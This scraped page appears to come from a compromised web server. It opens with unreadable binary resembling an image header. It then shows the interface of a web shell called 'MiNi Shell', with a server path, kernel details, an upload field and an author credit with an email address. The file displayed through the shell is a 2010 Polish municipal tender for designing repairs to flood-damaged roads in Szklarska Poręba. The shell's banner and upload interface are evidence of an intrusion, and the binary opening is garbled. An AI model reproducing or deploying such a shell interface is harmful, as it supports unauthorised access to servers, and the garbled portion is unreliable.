JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101202/346467-N-2010.html

<p class="kh_header"><b>Szklarska Poręba: Opracowanie dokumentacji projektowej dla zadania  pn.
Remont odcinków  dróg uszkodzonych w trakcie powodzi na terenie Szklarskiej Poręby</b><br>
<b>Numer ogłoszenia: 346467 - 2010; data zamieszczenia: 02.12.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Szklarska Poręba , ul. M. Buczka 2, 58-580 Szklarska Poręba, woj. dolnośląskie, tel. 075 7547712, faks 075 7547724.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szklarskaporeba.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej dla zadania  pn.
Remont odcinków  dróg uszkodzonych w trakcie powodzi na terenie Szklarskiej Poręby.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.  Przedmiotem zamówienia jest  opracowanie dokumentacji projektowej  ze zgłoszeniem robót budowlanych właściwemu Organowi włącznie dla zadania pn.  Remonty odcinków dróg uszkodzonych w trakcie powodzi na Terenia Szklarskiej Poręby.
Zakres rzeczowy opracowania projektowego winien objąć: 
1.	ul.Caritas	 Nr drogi 115322D	dł.do remontu~ 340m:		
Uszkodzona nawierzchnia bitumiczna 
i podbudowa drogi, wyrwy, spękania, rozmyte pobocza.

2.	 ul. Jana Matejki	 Nr drogi 115308D	dł.do remontu~ 902 :Uszkodzona nawierzchnia bitumiczna 
i podbudowa drogi, wyrwy, spękania, rozmyte pobocza.
W odcinku gruntowym wyrwy oraz rynny erozyjne.

3.	ul. Marii Konopnickiej Nr drogi	115362D	dł.do remontu	~ 400:	Wymyta nawierzchnia szutrowa, wyrwy, rynny erozyjne. 
Rozmyte ściany i dno rowów w pasie drogi, rowy niedrożne.

4. 	Os. Grottgera	Nr drogi 115336D	dł.do remontu	~225:	Wymyta nawierzchnia szutrowa, wyrwy.

5.	ul. Wolności	Nr drogi 115353D	dł.do remontu	~ 180:	Rozmyte ściany i dno rowów w pasie drogi.

6.	ul. Franciszkańska	Nr drogi11533D	dł.do remontu	~ 70:	Wymyta nawierzchnia szutrowa.


7.	ul. Obrońców Pokoju Nr drogi	 115332D	dł.do remontu
	
~252:	Uszkodzona nawierzchnia bitumiczna 
i podbudowa drogi, wyrwy, spękania, rozmyte pobocza.

8.	ul. Mikołaja Kopernika  Nr drogi	115304D	dł.do remontu	~315:	Uszkodzona nawierzchnia bitumiczna                i podbudowa drogi, wyrwy, spękania, rozmyte pobocza.

9.	ul.  Vlastimila Hofmana 	Nr drogi 115312D	dł.do remontu~450:	Uszkodzona nawierzchnia bitumiczna                i podbudowa drogi, wyrwy, spękania, rozmyte pobocza.
10.	ul. Armii Czerwonej  Nr drogi
	115355D	dł.do remontu ~320:	Rozmyte ściany i dno rowów w pasie drogi.
 
2. W ramach opracowania dokumentacji projektowej Wykonawca zobowiązany jest: 

a-  uzyskać mapę do celów projektowych 
b- złożyć , w imieniu Zamawiającego, oddzielnie dla każdego odcinka drogi, zgłoszenie robót  budowlanych do właściwego Organu

oraz dostarczyć oddzielnie dla każdego odcinka drogi objętego zakresem przedmiotu: 

c- Projekt budowlany  - w 4 egz. w wersji papierowej i w 1 egz. na nośniku elektronicznym. 

Projekt budowlany musi dodatkowo posiadać klauzulę o odpowiedzialności zawodowej za skutki przyjęcia złych rozwiązań projektowych .

Projekt budowlany musi spełniać co najmniej wymogi określone w ustawie z 07.07.1994 -Prawo Budowlane -  art.34 ,  w tym w ust.3  ppkt 3)  - stosownie do potrzeb,  jak również odpowiadać wymogom  rozporządzenia Ministra Infrastruktury z 03.07. 2003.  w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz.U. z 2003 r. , Nr 120, poz.1133, ze zmianami .

W trakcie opracowywania dokumentacji - w trybie roboczym przyjmowane rozwiązania należy uzgadniać z Zamawiającym i w formie pisemnej uzyskać  akceptację ostatecznej wersji rozwiązania. 
Bez akceptacji Zamawiającego - wykonawca wykonuje dalsze prace projektowe na własne ryzyko.

d- Projekt wykonawczy - w 4 egz. w wersji papierowej i w 1 egz. na nośniku elektronicznym.

e- uzyskać wszystkie niezbędne uzgodnienia, jeżeli wystąpi taka konieczność, 
uwaga: 
    Szklarska Poręba  objęta  jest strefą - NATURA 2000  w granicach   administracyjnych   miasta.

f- specyfikacje techniczne wykonania i odbioru robót - w 4 egz. w wersji papierowej i w 1 egz. na nośniku elektronicznym.

Specyfikacje techniczne wykonania i odbioru robót muszą odpowiadać  wymaganiom  rozporządzenia Ministra Infrastruktury z 02.09.2004r.  w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych oraz programu funkcjonalno -użytkowego  ( Dz.U. z 2004 r. , Nr 202, poz. 2072)





g- kosztorys inwestorski do ustalenia szacunkowej wartości zamówienia z klauzulą o odpowiedzia-      - lności sporządzającego kosztorys za skutki błędnego ustalenia szacunkowej wartości zadania   - w 4 egz. w wersji papierowej i w 1 egz. na nośniku elektronicznym.
     
Kosztorys inwestorski winien być sporządzony zgodnie z rozporządzeniem Ministra Infrastruktury                    z 18.05.2004 r.  w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym ( Dz.U. 2004r., Nr 130, poz.1389)  
 

h- przedmiar robót -  w 2 egz. w wersji papierowej i w 1 egz. na nośniku elektronicznym.

Przedmiar robót winien zawierać zestawienia przewidywanych do wykonania robót podstawowych w kolejności technologicznej ich wykonania wraz z ich szczegółowym opisem           i odniesieniem do stosownych pozycji Specyfikacji technicznej wykonania i odbioru robót lub wskazaniem podstaw ustalających szczegółowy opis, z wyliczeniem i zestawieniem ilości jednostek przedmiarowych robot podstawowych winien być sporządzony zgodnie z wymogami rozporządzenia Ministra Infrastruktury z 02.09.2004 r.   w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznej wykonania    i odbioru robót budowlanych oraz programem funkcjonalno -użytkowym ( Dz.U. z 2004 r. , Nr 202, poz. 2072) .

i- Projekt organizacji  ruchu  na czas budowy - w 3 egz. w wersji papierowej i w 1 egz. na nośniku elektronicznym.

3.	 W zakresie stwierdzenia zgodności  realizacji robót z dokumentacją projektową Wykonawca
pełnić będzie nieodpłatnie nadzór autorski..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.32.00.00-7, 71.24.20.00-6, 71.24.50.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1-poparta należytym wykonaniem w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -    w tym okresie, co najmniej 3 usługi zakresem podobne do objętych przedmiotem zamówienia.    Za jedną pracę podobną Zamawiający uzna: pracę projektową  polegającą na wykonaniu projektu budowlanego i wykonawczego lub budowlano-wykonawczego budowy, przebudowy lub remontu po uszkodzeniach powodziowych- dróg.

Wykonawcy zobowiązani są przedłożyć wykaz wykonanych usług sporządzony według wzoru stanowiącego Załącznik Nr 4 do niniejszej IDW, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączyć dokumenty potwierdzające, że usługi zostały wykonane należycie.

W przypadku wykazania wartości wykonanych robót  w walutach innych niż PLN-  należy podać kwotę w PLN , przeliczając kwotę wartości wykonanych robót rozliczanych w innych walutach na  PLN wg kursu danej waluty, ogłaszanego przez Narodowy Bank Polski na dzień 30 .11. 2010 r.

2-Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. 

Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu , iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu niniejszego zamówienia- Załącznik Nr 7 do IDW,   przy czym - jeżeli dotyczy to wiedzy i doświadczenia czyli niezbywalnych elementów wykonawcy               inny podmiot udostępniający wiedzę i doświadczenie, musi wystąpić przy realizacji przedmiotu zamówienia w charakterze podwykonawcy. 


3- w przypadku wspólnego ubiegania się Wykonawców o udzielenie niniejszego zamówienia oceniana będzie ich łączna wiedza i doświadczenie - w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku.

4- Wykonawca, Wykonawcy ubiegający się wspólnie o udzielenie zamówienia- wraz z ofertą złoży (złożą):

a) oświadczenie o spełnieniu warunków udziału w postępowaniu ( art.22 ust. 1 u.p.z.p.)               
- Załącznik Nr 2 do IDW

b) oświadczenie o braku podstaw do wykluczenia ( art.24 ust.1 u.p.z.p.) 
- Załącznik Nr 3 do IDW

5- ocena spełnienia warunków udziału w postępowaniu będzie dokonana na podstawie dokumentów według formuły:   spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1- dysponowanie odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,  tj. należy wskazać do uczestnictwa w wykonaniu niniejszego zamówienia minimum jedną osobę posiadającą uprawnienia budowlane do projektowania w specjalności drogowej bez ograniczeń  lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów. 

Samodzielne funkcje techniczne w budownictwie mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych.

Na potwierdzenie spełniania powyższego  warunku Wykonawcy są zobowiązani przedstawić:

a)	Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, a także zakresu wykonywanych przez nie czynności wraz z  informacją o podstawie dysponowania tymi osobami - Załącznikiem Nr 5 do IDW

b)	Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia - Załącznik Nr 6 do IDW.

2- Wykonawca może polegać na osobach zdolnych do wykonania niniejszego zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. 

Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu , iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu niniejszego zamówienia- Załącznik Nr 7 do IDW.

3- w przypadku wspólnego ubiegania się Wykonawców o udzielenie niniejszego zamówienia oceniany będzie ich  łączny potencjał techniczny i kadrowy - w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku.

4- Wykonawca, Wykonawcy ubiegający się wspólnie o udzielenie zamówienia- wraz z ofertą złoży (złożą):

a) oświadczenie o spełnieniu warunków udziału w postępowaniu ( art.22 ust. 1 u.p.z.p.)               
- Załącznik Nr 2 do IDW

b) oświadczenie o braku podstaw do wykluczenia ( art.24 ust.1 u.p.z.p.) 
- Załącznik Nr 3 do IDW

5- ocena spełnienia warunków udziału w postępowaniu będzie dokonana na podstawie dokumentów według formuły:   spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1-  popartej posiadaniem 

a-	  środków finansowych  lub zdolności kredytowej lub środków finansowych i zdolności kredytowej - w wysokości  50 000 zł ,

b- opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego ubezpieczenie od odpowiedzialności cywilnej  w zakresie prowadzonej działalności  związanej z przedmiotem zamówienia w wysokości min.  100 000 zł. 






Do przedłożenia polisy lub innego dokumentu potwierdzającego, że wykonawca jest
ubezpieczony od odpowiedzialności cywilnej  zostanie wezwany wykonawca , którego oferta
uznana zostanie za najkorzystniejszą   - przed podpisaniem umowy.

2- Wykonawca może polegać na zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. 

Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu , iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu niniejszego zamówienia- Załącznik Nr 7 do IDW,   przy czym

 - jeżeli  dotyczy to środków finansowych, o których mowa w punkcie 1.4.a-  - od takiego podmiotu wymagane jest  złożenie stosownego oświadczenia   - Załącznik Nr 2 do IDW

 


3- w przypadku wspólnego ubiegania się Wykonawców o udzielenie niniejszego zamówienia oceniana będzie ich łączna  sytuacja ekonomiczna i finansowa - w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku.

4- Wykonawca, Wykonawcy ubiegający się wspólnie o udzielenie zamówienia- wraz z ofertą złoży (złożą):

a) oświadczenie o spełnieniu warunków udziału w postępowaniu ( art.22 ust. 1 u.p.z.p.)               
- Załącznik Nr 2 do IDW

b) oświadczenie o braku podstaw do wykluczenia ( art.24 ust.1 u.p.z.p.) 
- Załącznik Nr 3 do IDW

5- ocena spełnienia warunków udziału w postępowaniu będzie dokonana na podstawie dokumentów według formuły:   spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający  przewiduje możliwość zmiany umowy w przypadku :

a) zmiany kluczowego personelu wykonawcy wskazanego w ofercie do realizacji przedmiotu 
zamówienia na osobę (y) spełniającą (e) co najmniej warunki podmiotowe określone w Cz.I. IDW, 






b) zmiany terminu realizacji zamówienia, o czas niezbędny do zachowania procedur wynikających  z u.p.z.p. lub  w przypadku wystąpienia okoliczności ,których Zamawiający pomimo dołożenia należytej staranności  nie  przewidział,

c) rezygnacji z wykonania pełnego zakresu usługi objętej zamówieniem, 

b) wystąpienia zmiany stosunków, której nie można było przewidzieć a wykonanie usługi  groziłoby wykonawcy lub Zamawiającemu rażącą stratą .

2. Zamawiający przewiduje możliwość wprowadzenia zmian nieistotnych tj. takich, które nie miałyby wpływu na krąg wykonawców ubiegających się o zamówienie, jak również na wynik postępowania ( np. zmiana danych teleadresowych, zmiana osób wskazanych do kontaktów między Stronami umowy, zmiana danych związanych z obsługą administracyjno-organizacyjną umowy m.in. zmiana rachunku bankowego, zmiana dokumentów potwierdzających uregulowanie płatności wobec podwykonawców.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.szklarskaporeba.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ze strony internetowej Zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.12.2010 godzina 11:00, miejsce: siedziba Zamawiającego:Urząd Miasta Szklarska Poręba , 58-580 Szklarska Poręba, ul. M. Buczka 2 lub bezpośrednio w Biurze Obsługi Interesanta- adres jw., parter..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com